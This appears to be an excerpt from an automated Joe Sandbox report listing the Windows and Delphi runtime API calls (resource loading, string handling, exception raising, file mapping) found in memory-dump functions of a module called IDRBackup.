                                                                                                  • API ID: System@$Res$qqriSystem@@Unicode$Array$qqrr20Char$qqrx20ErrorFileFromLastMoveStringStringpbi
                                                                                                  • String ID: B"
                                                                                                  • API String ID: 3244090159-4078893311
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5002A908: GetLastError.KERNEL32(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A908
                                                                                                    • Part of subcall function 5002A908: @Sysutils@RaiseLastOSError$qqri.RTL120(50010679,00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5002A90D
                                                                                                  • LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                  • LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Last$RaiseSysutils@$Error$qqrvResource$ErrorError$qqriFindLoadLock
                                                                                                  • String ID: CHARTABLE$PkP
                                                                                                  • API String ID: 2693630376-1680022972
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000855D
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF,?,?,?,?,?,?,500086BE,500041BB), ref: 50008563
                                                                                                  • GetStdHandle.KERNEL32(000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 50008578
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,500085B0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,500085EF), ref: 5000857E
                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 5000859C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                  • String ID: 0CP$Error$Runtime error at 00000000
                                                                                                  • API String ID: 1570097196-3976705077
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B59D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B5CA
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5B8
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(5001B7D4), ref: 5001B5D4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,5001B7D4), ref: 5001B5EF
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5001B601
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$ArraySystem@$Length$qqrvUnicode$Asg$qqrr20StringStringx20$Length$qqrrpvpvipi
                                                                                                  • String ID: False$True
                                                                                                  • API String ID: 1602069110-1895882422
                                                                                                  APIs
                                                                                                  • @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                    • Part of subcall function 500076F4: GetCurrentThreadId.KERNEL32 ref: 500076F7
                                                                                                  • GetTickCount.KERNEL32 ref: 50007343
                                                                                                  • GetTickCount.KERNEL32 ref: 50007355
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 50007388
                                                                                                  • GetTickCount.KERNEL32 ref: 500073AC
                                                                                                  • GetTickCount.KERNEL32 ref: 500073E6
                                                                                                  • @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500073F1
                                                                                                  • GetTickCount.KERNEL32 ref: 50007410
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 50007486
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$CurrentThread$Monitor@System@$Enter$qqrvEvent$qqrv
                                                                                                  • String ID:
                                                                                                  • API String ID: 1987720909-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CC29
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CC52
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002CD41), ref: 5002CCA7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002CD41), ref: 5002CCB9
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,5002CD41), ref: 5002CCC5
                                                                                                  • @Sysutils@TStringBuilder@_Replace$qqrix20System@UnicodeStringt2.RTL120(?,00000000,5002CD41), ref: 5002CCDA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  APIs
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1A3
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B1F5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B209
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B2A9
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A5E7
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A614
                                                                                                  • @System@@IntOver$qqrv.RTL120(?,00000000,5000A6C6), ref: 5000A651
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000A6C6), ref: 5000A65B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A67E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A695
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A6AB
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001ADED), ref: 5001ACFD
                                                                                                  • @Sysutils@AnsiExtractQuotedStr$qqrrpbb.RTL120(00000000,5001ADED), ref: 5001AD0C
                                                                                                    • Part of subcall function 5001AB98: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,?,5001AD11,00000000,5001ADED), ref: 5001ABA9
                                                                                                    • Part of subcall function 5001AB98: @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABD0
                                                                                                    • Part of subcall function 5001AB98: @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ABFE
                                                                                                    • Part of subcall function 5001AB98: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001AC30
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD37
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD6E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001AD94
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001ADED), ref: 5001ADB3
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001ADED), ref: 5001ADD2
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011D9A), ref: 50011CBB
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011D9A), ref: 50011CC6
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011CE3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011D1B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011D9A), ref: 50011D4C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011D9A), ref: 50011D51
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011D9A), ref: 50011D6E
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50011D9A), ref: 50011D78
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001137A), ref: 500112A6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112C3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112FB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001137A), ref: 5001132C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001137A), ref: 50011331
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 5001134E
                                                                                                  • @Character@TCharacter@IsSurrogate$qqrb.RTL120(00000000,5001137A), ref: 50011358
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010A42), ref: 5001096E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 5001098B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 500109C3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010A42), ref: 500109F4
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010A42), ref: 500109F9
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 50010A16
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50010A42), ref: 50010A20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000FC92), ref: 5000FBBE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FBDB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FC13
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5000FC92), ref: 5000FC44
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5000FC92), ref: 5000FC49
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FC92), ref: 5000FC66
                                                                                                  • @Character@TCharacter@IsLetter$qqrb.RTL120(00000000,5000FC92), ref: 5000FC70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010D36), ref: 50010C62
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010C7F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010CB7
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010D36), ref: 50010CE8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010D36), ref: 50010CED
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010D36), ref: 50010D0A
                                                                                                  • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120(00000000,50010D36), ref: 50010D14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B7D
                                                                                                    • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B89
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BAE
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BBA
                                                                                                    • Part of subcall function 5000A1E4: @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                    • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                    • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                    • Part of subcall function 5000A1E4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BDF
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BEB
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C06
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D679
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D674
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D69C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6A1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D71E), ref: 5002D6BE
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6ED
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseRecxiSysutils@Unicode$Except$qqrvException@$bctr$qqrp20Recpx14$AnsiAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20FromInternalList$qqrvLoadMetaStr$qqrr20String$qqrp20Stringpx14Stringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 211832472-0
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1B9
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1BF
                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1D5
                                                                                                  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 5001C1E9
                                                                                                  • ImageDirectoryEntryToData.IMAGEHLP(?,00000000,0000000E,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C212
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000), ref: 5001C21B
                                                                                                  • UnmapViewOfFile.KERNEL32(?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 5001C23D
                                                                                                  • CloseHandle.KERNEL32(?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C246
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002), ref: 5001C24F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSystem@@View$Char$qqrx20DataDirectoryEntryExit$qqrvFinallyImageMappingStringSystem@UnicodeUnmap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2267264102-0
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,00000000,?), ref: 5002DB70
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,?), ref: 5002DB75
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DB98
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DB9D
